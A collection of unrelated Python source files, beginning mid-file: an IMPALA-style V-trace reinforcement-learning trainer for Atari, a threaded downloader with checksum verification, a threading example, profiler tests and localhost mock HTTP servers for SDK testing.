self._means[name] = mean
self._vars[name] = var
self._counts[name] += 1
def means(self):
return self._means
def vars(self):
return self._vars
def stds(self):
return {k: v ** 0.5 for k, v in self._vars.items()}
def summary(self, prefix=""):
means = self.means()
stds = self.stds()
total = sum(means.values())
result = prefix
for k in sorted(means, key=means.get, reverse=True):
result += f"\n %s: %.6fms +- %.6fms (%.2f%%) " % (
k,
1000 * means[k],
1000 * stds[k],
100 * means[k] / total,
)
result += "\nTotal: %.6fms" % (1000 * total)
return result
import argparse
import logging
import os
import pprint
import threading
import time
import timeit
import traceback
import typing
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
import torch
from torch import multiprocessing as mp
from torch import nn
from torch.nn import functional as F
from stable_baselines3.common.vec_env import DummyVecEnv, SubprocVecEnv, VecEnvWrapper
import collections
import torch
import torch.nn.functional as F
# yapf: disable
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
# Common arguments
parser.add_argument('--exp-name', type=str, default=os.path.basename(__file__).rstrip(".py"),
help='the name of this experiment')
parser.add_argument('--gym-id', type=str, default="PongNoFrameskip-v4",
help='the id of the gym environment')
parser.add_argument("--mode", default="train",
choices=["train", "test", "test_render"],
help="Training or test mode.")
parser.add_argument("--xpid", default=None,
help="Experiment id (default: None).")
# Training settings.
parser.add_argument("--disable_checkpoint", action="store_true",
help="Disable saving checkpoint.")
parser.add_argument("--savedir", default="~/logs/torchbeast",
help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=45, type=int, metavar="N",
help="Number of actors (default: 4).")
parser.add_argument("--total_steps", default=30000000, type=int, metavar="T",
help="Total environment steps to train for.")
parser.add_argument("--batch_size", default=4, type=int, metavar="B",
help="Learner batch size.")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
help="The unroll length (time dimension).")
parser.add_argument("--num_buffers", default=60, type=int,
metavar="N", help="Number of shared-memory buffers.")
parser.add_argument("--num_learner_threads", "--num_threads", default=4, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--disable_cuda", action="store_true",
help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
help="Use LSTM in agent model.")
# Loss settings.
parser.add_argument("--entropy_cost", default=0.01,
type=float, help="Entropy cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5,
type=float, help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99,
type=float, help="Discounting factor.")
parser.add_argument("--reward_clipping", default="abs_one",
choices=["abs_one", "none"],
help="Reward clipping.")
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048,
type=float, metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.01, type=float,
help="RMSProp epsilon.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
help="Global gradient norm clip.")
# yapf: enable
def _format_frame(frame):
frame = torch.from_numpy(frame)
return frame.view((1, 1) + frame.shape) # (...) -> (T,B,...).
class Environment:
def __init__(self, gym_env):
self.gym_env = gym_env
self.episode_return = None
self.episode_step = None
def initial(self):
initial_reward = torch.zeros(1, 1)
# This supports only single-tensor actions ATM.
initial_last_action = torch.zeros(1, 1, dtype=torch.int64)
self.episode_return = torch.zeros(1, 1)
self.episode_step = torch.zeros(1, 1, dtype=torch.int32)
initial_done = torch.ones(1, 1, dtype=torch.uint8)
initial_frame = _format_frame(self.gym_env.reset())
return dict(
frame=initial_frame,
reward=initial_reward,
done=initial_done,
episode_return=self.episode_return,
episode_step=self.episode_step,
last_action=initial_last_action,
)
def step(self, action):
frame, reward, done, unused_info = self.gym_env.step(action.item())
self.episode_step += 1
self.episode_return += reward
episode_step = self.episode_step
episode_return = self.episode_return
if done:
frame = self.gym_env.reset()
self.episode_return = torch.zeros(1, 1)
self.episode_step = torch.zeros(1, 1, dtype=torch.int32)
frame = _format_frame(frame)
reward = torch.tensor(reward).view(1, 1)
done = torch.tensor(done).view(1, 1)
return dict(
frame=frame,
reward=reward,
done=done,
episode_return=episode_return,
episode_step=episode_step,
last_action=action,
)
def close(self):
self.gym_env.close()
Buffers = typing.Dict[str, typing.List[torch.Tensor]]
def create_buffers(args, obs_shape, num_actions) -> Buffers:
T = args.unroll_length
specs = dict(
frame=dict(size=(T + 1, *obs_shape), dtype=torch.uint8),
reward=dict(size=(T + 1,), dtype=torch.float32),
done=dict(size=(T + 1,), dtype=torch.bool),
episode_return=dict(size=(T + 1,), dtype=torch.float32),
episode_step=dict(size=(T + 1,), dtype=torch.int32),
policy_logits=dict(size=(T + 1, num_actions), dtype=torch.float32),
baseline=dict(size=(T + 1,), dtype=torch.float32),
last_action=dict(size=(T + 1,), dtype=torch.int64),
action=dict(size=(T + 1,), dtype=torch.int64),
)
buffers: Buffers = {key: [] for key in specs}
for _ in range(args.num_buffers):
for key in buffers:
buffers[key].append(torch.empty(**specs[key]).share_memory_())
return buffers
def act(
args,
actor_index: int,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
model: torch.nn.Module,
buffers: Buffers,
initial_agent_state_buffers,
):
try:
logging.info("Actor %i started.", actor_index)
timings = Timings() # Keep track of how fast things are.
gym_env = create_env(args)
seed = actor_index ^ int.from_bytes(os.urandom(4), byteorder="little")
gym_env.seed(seed)
env = Environment(gym_env)
def make_env(args):
def thunk():
env = create_env(args)
return env
return thunk
envs = DummyVecEnv([make_env(args) for i in range(1)])
env_output = env.initial()
envs.reset()
agent_state = model.initial_state(batch_size=1)
agent_output, unused_state = model(env_output, agent_state)
while True:
index = free_queue.get()
if index is None:
break
# Write old rollout end.
for key in env_output:
buffers[key][index][0, ...] = env_output[key]
for key in agent_output:
buffers[key][index][0, ...] = agent_output[key]
for i, tensor in enumerate(agent_state):
initial_agent_state_buffers[index][i][...] = tensor
# Do new rollout.
for t in range(args.unroll_length):
timings.reset()
with torch.no_grad():
agent_output, agent_state = model(env_output, agent_state)
# timings.time("model")
env_output = env.step(agent_output["action"])
# env_output = env.step(agent_output["action"])
# envs.step((torch.randint(0, envs.action_space.n, (envs.num_envs,))).numpy())
assert agent_output["action"] == env_output["last_action"]
timings.time("step")
for key in env_output:
buffers[key][index][t + 1, ...] = env_output[key]
for key in agent_output:
buffers[key][index][t + 1, ...] = agent_output[key]
timings.time("write")
full_queue.put(index)
if actor_index == 0:
logging.info("Actor %i: %s", actor_index, timings.summary())
except KeyboardInterrupt:
pass # Return silently.
except Exception as e:
logging.error("Exception in worker process %i", actor_index)
traceback.print_exc()
print()
raise e
VTraceFromLogitsReturns = collections.namedtuple(
"VTraceFromLogitsReturns",
[
"vs",
"pg_advantages",
"log_rhos",
"behavior_action_log_probs",
"target_action_log_probs",
],
)
VTraceReturns = collections.namedtuple("VTraceReturns", "vs pg_advantages")
def action_log_probs(policy_logits, actions):
return -F.nll_loss(
F.log_softmax(torch.flatten(policy_logits, 0, -2), dim=-1),
torch.flatten(actions),
reduction="none",
).view_as(actions)
def from_logits(
behavior_policy_logits,
target_policy_logits,
actions,
discounts,
rewards,
values,
bootstrap_value,
clip_rho_threshold=1.0,
clip_pg_rho_threshold=1.0,
):
"""V-trace for softmax policies."""
target_action_log_probs = action_log_probs(target_policy_logits, actions)
behavior_action_log_probs = action_log_probs(behavior_policy_logits, actions)
log_rhos = target_action_log_probs - behavior_action_log_probs
vtrace_returns = from_importance_weights(
log_rhos=log_rhos,
discounts=discounts,
rewards=rewards,
values=values,
bootstrap_value=bootstrap_value,
clip_rho_threshold=clip_rho_threshold,
clip_pg_rho_threshold=clip_pg_rho_threshold,
)
return VTraceFromLogitsReturns(
log_rhos=log_rhos,
behavior_action_log_probs=behavior_action_log_probs,
target_action_log_probs=target_action_log_probs,
**vtrace_returns._asdict(),
)
@torch.no_grad()
def from_importance_weights(
log_rhos,
discounts,
rewards,
values,
bootstrap_value,
clip_rho_threshold=1.0,
clip_pg_rho_threshold=1.0,
):
"""V-trace from log importance weights."""
with torch.no_grad():
rhos = torch.exp(log_rhos)
if clip_rho_threshold is not None:
clipped_rhos = torch.clamp(rhos, max=clip_rho_threshold)
else:
clipped_rhos = rhos
cs = torch.clamp(rhos, max=1.0)
# Append bootstrapped value to get [v1, ..., v_t+1]
values_t_plus_1 = torch.cat(
[values[1:], torch.unsqueeze(bootstrap_value, 0)], dim=0
)
deltas = clipped_rhos * (rewards + discounts * values_t_plus_1 - values)
acc = torch.zeros_like(bootstrap_value)
result = []
for t in range(discounts.shape[0] - 1, -1, -1):
acc = deltas[t] + discounts[t] * cs[t] * acc
result.append(acc)
result.reverse()
vs_minus_v_xs = torch.stack(result)
# Add V(x_s) to get v_s.
vs = torch.add(vs_minus_v_xs, values)
# Advantage for policy gradient.
broadcasted_bootstrap_values = torch.ones_like(vs[0]) * bootstrap_value
vs_t_plus_1 = torch.cat(
[vs[1:], broadcasted_bootstrap_values.unsqueeze(0)], dim=0
)
if clip_pg_rho_threshold is not None:
clipped_pg_rhos = torch.clamp(rhos, max=clip_pg_rho_threshold)
else:
clipped_pg_rhos = rhos
pg_advantages = clipped_pg_rhos * (rewards + discounts * vs_t_plus_1 - values)
# Make sure no gradients backpropagated through the returned values.
return VTraceReturns(vs=vs, pg_advantages=pg_advantages)
def get_batch(
args,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
buffers: Buffers,
initial_agent_state_buffers,
timings,
lock=threading.Lock(),
):
with lock:
timings.time("lock")
indices = [full_queue.get() for _ in range(args.batch_size)]
timings.time("dequeue")
batch = {
key: torch.stack([buffers[key][m] for m in indices], dim=1) for key in buffers
}
initial_agent_state = (
torch.cat(ts, dim=1)
for ts in zip(*[initial_agent_state_buffers[m] for m in indices])
)
timings.time("batch")
for m in indices:
free_queue.put(m)
timings.time("enqueue")
batch = {k: t.to(device=args.device, non_blocking=True) for k, t in batch.items()}
initial_agent_state = tuple(
t.to(device=args.device, non_blocking=True) for t in initial_agent_state
)
timings.time("device")
return batch, initial_agent_state
def compute_baseline_loss(advantages):
return 0.5 * torch.sum(advantages ** 2)
def compute_entropy_loss(logits):
"""Return the entropy loss, i.e., the negative entropy of the policy."""
policy = F.softmax(logits, dim=-1)
log_policy = F.log_softmax(logits, dim=-1)
return torch.sum(policy * log_policy)
def compute_policy_gradient_loss(logits, actions, advantages):
cross_entropy = F.nll_loss(
F.log_softmax(torch.flatten(logits, 0, 1), dim=-1),
target=torch.flatten(actions, 0, 1),
reduction="none",
)
cross_entropy = cross_entropy.view_as(advantages)
return torch.sum(cross_entropy * advantages.detach())
class AtariNet(nn.Module):
def __init__(self, observation_shape, num_actions, use_lstm=False):
super(AtariNet, self).__init__()
self.observation_shape = observation_shape
self.num_actions = num_actions
# Feature extraction.
self.conv1 = nn.Conv2d(
in_channels=self.observation_shape[0],
out_channels=32,
kernel_size=8,
stride=4,
)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
# Fully connected layer.
self.fc = nn.Linear(3136, 512)
# FC output size + one-hot of last action + last reward.
core_output_size = self.fc.out_features + num_actions + 1
self.use_lstm = use_lstm
if use_lstm:
self.core = nn.LSTM(core_output_size, core_output_size, 2)
self.policy = nn.Linear(core_output_size, self.num_actions)
self.baseline = nn.Linear(core_output_size, 1)
def initial_state(self, batch_size):
if not self.use_lstm:
return tuple()
return tuple(
torch.zeros(self.core.num_layers, batch_size, self.core.hidden_size)
for _ in range(2)
)
def forward(self, inputs, core_state=()):
x = inputs["frame"] # [T, B, C, H, W].
T, B, *_ = x.shape
x = torch.flatten(x, 0, 1) # Merge time and batch.
x = x.float() / 255.0
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = x.view(T * B, -1)
x = F.relu(self.fc(x))
one_hot_last_action = F.one_hot(
inputs["last_action"].view(T * B), self.num_actions
).float()
clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1)
core_input = torch.cat([x, clipped_reward, one_hot_last_action], dim=-1)
if self.use_lstm:
core_input = core_input.view(T, B, -1)
core_output_list = []
notdone = (~inputs["done"]).float()
for input, nd in zip(core_input.unbind(), notdone.unbind()):
# Reset core state to zero whenever an episode ended.
# Make `done` broadcastable with (num_layers, B, hidden_size)
# states:
nd = nd.view(1, -1, 1)
core_state = tuple(nd * s for s in core_state)
output, core_state = self.core(input.unsqueeze(0), core_state)
core_output_list.append(output)
core_output = torch.flatten(torch.cat(core_output_list), 0, 1)
else:
core_output = core_input
core_state = tuple()
policy_logits = self.policy(core_output)
baseline = self.baseline(core_output)
if self.training:
action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1)
else:
# Don't sample when testing.
action = torch.argmax(policy_logits, dim=1)
policy_logits = policy_logits.view(T, B, self.num_actions)
baseline = baseline.view(T, B)
action = action.view(T, B)
return (
dict(policy_logits=policy_logits, baseline=baseline, action=action),
core_state,
)
def batch_and_learn(i, lock=threading.Lock()):
"""Thread target for the learning process."""
global step, stats
timings = Timings()
while step < args.total_steps:
timings.reset()
batch, agent_state = get_batch(
args,
free_queue,
full_queue,
buffers,
initial_agent_state_buffers,
timings,
)
actor_model = model
initial_agent_state = agent_state
"""Performs a learning (optimization) step."""
with lock:
learner_outputs, unused_state = learner_model(batch, initial_agent_state)
# Take final value function slice for bootstrapping.
bootstrap_value = learner_outputs["baseline"][-1]
# Move from obs[t] -> action[t] to action[t] -> obs[t].
batch = {key: tensor[1:] for key, tensor in batch.items()}
learner_outputs = {key: tensor[:-1] for key, tensor in learner_outputs.items()}
rewards = batch["reward"]
if args.reward_clipping == "abs_one":
clipped_rewards = torch.clamp(rewards, -1, 1)
elif args.reward_clipping == "none":
clipped_rewards = rewards
discounts = (~batch["done"]).float() * args.discounting
vtrace_returns = from_logits(
behavior_policy_logits=batch["policy_logits"],
target_policy_logits=learner_outputs["policy_logits"],
actions=batch["action"],
discounts=discounts,
rewards=clipped_rewards,
values=learner_outputs["baseline"],
bootstrap_value=bootstrap_value,
)
pg_loss = compute_policy_gradient_loss(
learner_outputs["policy_logits"],
batch["action"],
vtrace_returns.pg_advantages,
)
baseline_loss = args.baseline_cost * compute_baseline_loss(
vtrace_returns.vs - learner_outputs["baseline"]
)
entropy_loss = args.entropy_cost * compute_entropy_loss(
learner_outputs["policy_logits"]
)
total_loss = pg_loss + baseline_loss + entropy_loss
episode_returns = batch["episode_return"][batch["done"]]
stats = {
"episode_returns": tuple(episode_returns.cpu().numpy()),
"mean_episode_return": torch.mean(episode_returns).item(),
"total_loss": total_loss.item(),
"pg_loss": pg_loss.item(),
"baseline_loss": baseline_loss.item(),
"entropy_loss": entropy_loss.item(),
}
optimizer.zero_grad()
total_loss.backward()
nn.utils.clip_grad_norm_(learner_model.parameters(), args.grad_norm_clipping)
optimizer.step()
scheduler.step()
actor_model.load_state_dict(learner_model.state_dict())
timings.time("learn")
with lock:
step += T * B
if i == 0:
logging.info("Batch and learn: %s", timings.summary())
logging.basicConfig(
format=(
"[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s"
),
level=0,
)
Net = AtariNet
def create_env(args):
return wrap_pytorch(
wrap_deepmind(
make_atari(args.gym_id),
clip_rewards=False,
frame_stack=True,
scale=False,
)
)
args = parser.parse_args()
if args.num_buffers is None: # Set sensible default for num_buffers.
args.num_buffers = max(2 * args.num_actors, args.batch_size)
if args.num_actors >= args.num_buffers:
raise ValueError("num_buffers should be larger than num_actors")
if args.num_buffers < args.batch_size:
raise ValueError("num_buffers should be larger than batch_size")
T = args.unroll_length
B = args.batch_size
args.device = None
if not args.disable_cuda and torch.cuda.is_available():
logging.info("Using CUDA.")
args.device = torch.device("cuda")
else:
logging.info("Not using CUDA.")
args.device = torch.device("cpu")
env = create_env(args)
model = Net(env.observation_space.shape, env.action_space.n, args.use_lstm)
buffers = create_buffers(args, env.observation_space.shape, model.num_actions)
model.share_memory()
# Add initial RNN state.
initial_agent_state_buffers = []
for _ in range(args.num_buffers):
state = model.initial_state(batch_size=1)
for t in state:
t.share_memory_()
initial_agent_state_buffers.append(state)
actor_processes = []
ctx = mp.get_context("fork")
free_queue = ctx.SimpleQueue()
full_queue = ctx.SimpleQueue()
for i in range(args.num_actors):
actor = ctx.Process(
target=act,
args=(
args,
i,
free_queue,
full_queue,
model,
buffers,
initial_agent_state_buffers,
),
)
actor.start()
actor_processes.append(actor)
learner_model = Net(
env.observation_space.shape, env.action_space.n, args.use_lstm
).to(device=args.device)
optimizer = torch.optim.RMSprop(
learner_model.parameters(),
lr=args.learning_rate,
momentum=args.momentum,
eps=args.epsilon,
alpha=args.alpha,
)
def lr_lambda(epoch):
return 1 - min(epoch * T * B, args.total_steps) / args.total_steps
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
logger = logging.getLogger("logfile")
stat_keys = [
"total_loss",
"mean_episode_return",
"pg_loss",
"baseline_loss",
"entropy_loss",
]
logger.info("# Step\t%s", "\t".join(stat_keys))
step, stats = 0, {}
for m in range(args.num_buffers):
free_queue.put(m)
threads = []
for i in range(args.num_learner_threads):
thread = threading.Thread(
target=batch_and_learn, name="batch-and-learn-%d" % i, args=(i,)
)
thread.start()
threads.append(thread)
timer = timeit.default_timer
try:
last_checkpoint_time = timer()
while step < args.total_steps:
start_step = step
start_time = timer()
time.sleep(5)
sps = (step - start_step) / (timer() - start_time)
if stats.get("episode_returns", None):
mean_return = (
"Return per episode: %.1f. " % stats["mean_episode_return"]
)
else:
mean_return = ""
total_loss = stats.get("total_loss", float("inf"))
logging.info(
"Steps %i @ %.1f SPS. Loss %f. %sStats:\n%s",
step,
sps,
total_loss,
mean_return,
pprint.pformat(stats),
)
except KeyboardInterrupt:
pass
else:
for thread in threads:
thread.join()
logging.info("Learning finished after %d steps.", step)
finally:
for _ in range(args.num_actors):
free_queue.put(None)
for actor in actor_processes:
actor.join(timeout=1)
|
download.py
|
"""Holds logic for downloading data dump files, with hooks for download progress and completion."""
import bz2
import functools
import gzip
import hashlib
import io
import re
from tempfile import NamedTemporaryFile
import threading
from types import TracebackType
from typing import Optional, Callable
import requests
ProgressHookType = Callable[[int, int], None]
CompletionHookType = Callable[
[Optional[type], Optional[Exception], Optional[TracebackType]], None
]
class _FileWrapper(io.IOBase):
"""Wraps a file for tracking how much of the file has been accessed.
Used for tracking decompression."""
def __init__(self, source: io.IOBase):
super().__init__()
self.source: io.IOBase = source
self.delta = 0
def read(self, n_characters: int = None):
"""Mirrors io.IOBase.read for readable files."""
if n_characters:
_content = self.source.read(n_characters)
else:
_content = self.source.read()
self.delta = len(_content)
return _content
class _CompletionManager:
"""Accepts a hook which is passed arguments similar to those passed to a context manager."""
hook: CompletionHookType
def __init__(self, hook: CompletionHookType):
self.hook = hook
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
return self.hook(exc_type, exc_val, exc_tb)
def _decompress(
from_file_wrapper: _FileWrapper,
to_file_path: str,
compression_type: str,
progress_hook: ProgressHookType,
completion_hook: CompletionHookType,
size: int,
):
"""Decompresses file contained in a _FileWrapper."""
assert compression_type in ("bz2", "gz", None)
transfer_chunk_size = 1024 * 10
transfer_wrapper: io.IOBase = {
"bz2": lambda: bz2.BZ2File(from_file_wrapper),
"gz": lambda: gzip.GzipFile(fileobj=from_file_wrapper),
None: lambda: from_file_wrapper,
}[compression_type]()
with transfer_wrapper, open(to_file_path, "wb") as to_file_obj, _CompletionManager(
completion_hook
):
while content := transfer_wrapper.read(transfer_chunk_size):
to_file_obj.write(content)
progress_hook(from_file_wrapper.delta, size)
def _download(
response: requests.Response,
intermediate_buffer: NamedTemporaryFile,
chunk_size: int,
size: int,
progress_hook: ProgressHookType,
completion_hook: CompletionHookType,
sha1: str,
):
"""Download file from response and verify sha1 sum if available."""
hex_d = hashlib.sha1()
with _CompletionManager(completion_hook):
for chunk in response.iter_content(chunk_size=chunk_size):
progress_hook(intermediate_buffer.write(chunk), size)
hex_d.update(chunk)
if sha1:
assert sha1 == hex_d.hexdigest(), "Download verification failed."
def _download_and_decompress(
from_location: str,
to_location: str,
size: int,
session: requests.Session,
sha1: str,
compression_type: str,
download_progress_hook: ProgressHookType,
download_completion_hook: CompletionHookType,
decompress_progress_hook: ProgressHookType,
decompress_completion_hook: CompletionHookType,
chunk_size: int = 1024,
):
"""Downloads file from source, then decompresses it by the protocol provided."""
response = session.get(from_location, stream=True)
response.raise_for_status()
with NamedTemporaryFile() as intermediate_buffer:
_download(
response,
intermediate_buffer,
chunk_size,
size,
download_progress_hook,
download_completion_hook,
sha1,
)
intermediate_buffer.seek(0)
wrapper = _FileWrapper(intermediate_buffer)
return _decompress(
wrapper,
to_location,
compression_type,
decompress_progress_hook,
decompress_completion_hook,
size,
)
def _automatic_resolve_to_location(_from_location: str, _will_decompress: bool) -> str:
"""Holds logic for automatic destination assignment/file suffix cleanup."""
last_term = _from_location.split("/")[-1]
if _will_decompress:
return re.compile(r"(?:\.gz|\.bz2)$").sub("", last_term, count=1)
return last_term
def progress_hook_noop(_delta: int, _total: int):
"""
Does nothing, but takes the arguments that would otherwise be passed to a progress hook.
"""
def completion_hook_noop(
_exc_type: Optional[type],
_exc_val: Optional[Exception],
_exc_tb: Optional[TracebackType],
):
"""
Does nothing, but takes the arguments that would otherwise be passed to a completion hook.
"""
def base_download(
from_location: str,
to_location: Optional[str],
size: int,
session: requests.Session,
sha1: str,
decompress: bool,
download_progress_hook: ProgressHookType,
download_completion_hook: CompletionHookType,
decompress_progress_hook: ProgressHookType,
decompress_completion_hook: CompletionHookType,
chunk_size: int = 1024,
):
"""Contains core logic for path resolution, compression type resolution,
shook resolution, and threading."""
to_location = (
to_location
if to_location is not None
else _automatic_resolve_to_location(from_location, decompress)
)
if not decompress:
compression_type = None
elif from_location.endswith(".gz"):
compression_type = "gz"
elif from_location.endswith(".bz2"):
compression_type = "bz2"
else:
compression_type = None
def progress_noop_if_none(hook) -> ProgressHookType:
return progress_hook_noop if hook is None else hook
def completion_noop_if_none(hook) -> CompletionHookType:
return completion_hook_noop if hook is None else hook
keywords = {
"from_location": from_location,
"to_location": to_location,
"size": size,
"session": session,
"sha1": sha1,
"chunk_size": chunk_size,
"compression_type": compression_type,
"download_progress_hook": progress_noop_if_none(download_progress_hook),
"download_completion_hook": completion_noop_if_none(download_completion_hook),
"decompress_progress_hook": progress_noop_if_none(decompress_progress_hook),
"decompress_completion_hook": completion_noop_if_none(decompress_completion_hook),
}
func = functools.partial(_download_and_decompress, **keywords)
thread = threading.Thread(target=func)
thread.start()
return thread
|
example2.py
|
from queue import Queue
from threading import Thread
N = 1_000_000
N_THREADS = 10
q = Queue()
a = list(range(N))
b = list(range(N))
def work(sub_a, sub_b):
sub_c = [x + y for x, y in zip(sub_a, sub_b)]
sub_c = sum(sub_c)
q.put(sub_c)
threads = []
for i in range(N_THREADS):
s = i * (N // N_THREADS)
e = s + (N // N_THREADS)
sub_a = a[s:e]
sub_b = b[s:e]
t = Thread(target=work, args=(sub_a, sub_b))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
sub_cs = []
while not q.empty():
sub_c = q.get()
sub_cs.append(sub_c)
q.task_done()
s = sum(sub_cs)
print(s)
|
test_profile.py
|
import sys
import time
from toolz import first
from threading import Thread
from distributed.profile import (process, merge, create, call_stack,
identifier)
from distributed.compatibility import get_thread_identity
def test_basic():
def test_g():
time.sleep(0.01)
def test_h():
time.sleep(0.02)
def test_f():
for i in range(100):
test_g()
test_h()
thread = Thread(target=test_f)
thread.daemon = True
thread.start()
state = create()
for i in range(100):
time.sleep(0.02)
frame = sys._current_frames()[thread.ident]
process(frame, None, state)
assert state['count'] == 100
d = state
while len(d['children']) == 1:
d = first(d['children'].values())
assert d['count'] == 100
assert 'test_f' in str(d['description'])
g = [c for c in d['children'].values() if 'test_g' in str(c['description'])][0]
h = [c for c in d['children'].values() if 'test_h' in str(c['description'])][0]
assert g['count'] < h['count']
assert g['count'] + h['count'] == 100
def test_merge():
a1 = {
'count': 5,
'identifier': 'root',
'description': 'a',
'children': {
'b': {'count': 3,
'description': 'b-func',
'identifier': 'b',
'children': {}},
'c': {'count': 2,
'description': 'c-func',
'identifier': 'c',
'children': {}}}}
a2 = {
'count': 4,
'description': 'a',
'identifier': 'root',
'children': {
'd': {'count': 2,
'description': 'd-func',
'children': {},
'identifier': 'd'},
'c': {'count': 2,
'description': 'c-func',
'children': {},
'identifier': 'c'}}}
expected = {
'count': 9,
'identifier': 'root',
'description': 'a',
'children': {
'b': {'count': 3,
'description': 'b-func',
'identifier': 'b',
'children': {}},
'd': {'count': 2,
'description': 'd-func',
'identifier': 'd',
'children': {}},
'c': {'count': 4,
'description': 'c-func',
'identifier': 'c',
'children': {}}}}
assert merge(a1, a2) == expected
def test_merge_empty():
assert merge() == create()
assert merge(create()) == create()
assert merge(create(), create()) == create()
def test_call_stack():
frame = sys._current_frames()[get_thread_identity()]
L = call_stack(frame)
assert isinstance(L, list)
assert all(isinstance(s, str) for s in L)
assert 'test_call_stack' in str(L[-1])
def test_identifier():
frame = sys._current_frames()[get_thread_identity()]
assert identifier(frame) == identifier(frame)
assert identifier(None) == identifier(None)
|
mockserver.py
|
"""SSE mock server."""
import json
from collections import namedtuple
import queue
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
Request = namedtuple('Request', ['method', 'path', 'headers', 'body'])
class SSEMockServer(object):
"""SSE server for testing purposes."""
protocol_version = 'HTTP/1.1'
GRACEFUL_REQUEST_END = 'REQ-END'
VIOLENT_REQUEST_END = 'REQ-KILL'
def __init__(self, req_queue=None):
"""Consruct a mock server."""
self._queue = queue.Queue()
self._server = HTTPServer(('localhost', 0),
lambda *xs: SSEHandler(self._queue, *xs, req_queue=req_queue))
self._server_thread = threading.Thread(target=self._blocking_run)
self._server_thread.setDaemon(True)
self._done_event = threading.Event()
def _blocking_run(self):
"""Execute."""
self._server.serve_forever()
self._done_event.set()
def port(self):
"""Return the assigned port."""
return self._server.server_port
def publish(self, event):
"""Publish an event."""
self._queue.put(event, block=False)
def start(self):
"""Start the server asyncrhonously."""
self._server_thread.start()
def wait(self, timeout=None):
"""Wait for the server to shutdown."""
return self._done_event.wait(timeout)
def stop(self):
"""Stop the server."""
self._server.shutdown()
class SSEHandler(BaseHTTPRequestHandler):
"""Handler."""
def __init__(self, event_queue, *args, **kwargs):
"""Construct a handler."""
self._queue = event_queue
self._req_queue = kwargs.get('req_queue')
BaseHTTPRequestHandler.__init__(self, *args)
def do_GET(self): #pylint:disable=invalid-name
"""Respond to a GET request."""
self.send_response(200)
self.send_header("Content-type", "text/event-stream")
self.send_header("Transfer-Encoding", "chunked")
self.send_header("Connection", "keep-alive")
self.end_headers()
if self._req_queue is not None:
headers = dict(zip(self.headers.keys(), self.headers.values()))
self._req_queue.put(Request('GET', self.path, headers, None))
def write_chunk(chunk):
"""Write an event/chunk."""
tosend = '%X\r\n%s\r\n'%(len(chunk), chunk)
self.wfile.write(tosend.encode('utf-8'))
while True:
event = self._queue.get()
if event == SSEMockServer.GRACEFUL_REQUEST_END:
break
elif event == SSEMockServer.VIOLENT_REQUEST_END:
raise Exception('exploding')
chunk = ''
chunk += 'id: % s\n' % event['id'] if 'id' in event else ''
chunk += 'event: % s\n' % event['event'] if 'event' in event else ''
chunk += 'retry: % s\n' % event['retry'] if 'retry' in event else ''
chunk += 'data: % s\n' % event['data'] if 'data' in event else ''
if chunk != '':
write_chunk(chunk + '\r\n')
self.wfile.write('0\r\n\r\n'.encode('utf-8'))
class SplitMockServer(object):
"""SDK server mock for testing purposes."""
protocol_version = 'HTTP/1.1'
def __init__(self, split_changes=None, segment_changes=None, req_queue=None,
auth_response=None):
"""
Consruct a mock server.
:param changes: mapping of changeNumbers to splitChanges responses
:type changes: dict
"""
split_changes = split_changes if split_changes is not None else {}
segment_changes = segment_changes if segment_changes is not None else {}
self._server = HTTPServer(('localhost', 0),
lambda *xs: SDKHandler(split_changes, segment_changes, *xs,
req_queue=req_queue,
auth_response=auth_response))
self._server_thread = threading.Thread(target=self._blocking_run, name="SplitMockServer")
self._server_thread.setDaemon(True)
self._done_event = threading.Event()
def _blocking_run(self):
"""Execute."""
self._server.serve_forever()
self._done_event.set()
def port(self):
"""Return the assigned port."""
return self._server.server_port
def start(self):
"""Start the server asyncrhonously."""
self._server_thread.start()
def wait(self, timeout=None):
"""Wait for the server to shutdown."""
return self._done_event.wait(timeout)
def stop(self):
"""Stop the server."""
self._server.shutdown()
class SDKHandler(BaseHTTPRequestHandler):
"""Handler."""
def __init__(self, split_changes, segment_changes, *args, **kwargs):
"""Construct a handler."""
self._req_queue = kwargs.get('req_queue')
self._auth_response = kwargs.get('auth_response')
self._split_changes = split_changes
self._segment_changes = segment_changes
BaseHTTPRequestHandler.__init__(self, *args)
def _parse_qs(self):
raw_query = self.path.split('?')[1] if '?' in self.path else ''
return dict([item.split('=') for item in raw_query.split('&')])
def _handle_segment_changes(self):
qstring = self._parse_qs()
since = int(qstring.get('since', -1))
name = self.path.split('/')[-1].split('?')[0]
if name is None:
self.send_response(400)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write('{}'.encode('utf-8'))
return
to_send = self._segment_changes.get((name, since,))
if to_send is None:
self.send_response(404)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write('{}'.encode('utf-8'))
return
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps(to_send).encode('utf-8'))
def _handle_split_changes(self):
qstring = self._parse_qs()
since = int(qstring.get('since', -1))
to_send = self._split_changes.get(since)
if to_send is None:
self.send_response(404)
self.send_header("Content-type", "application/json")
self.end_headers()
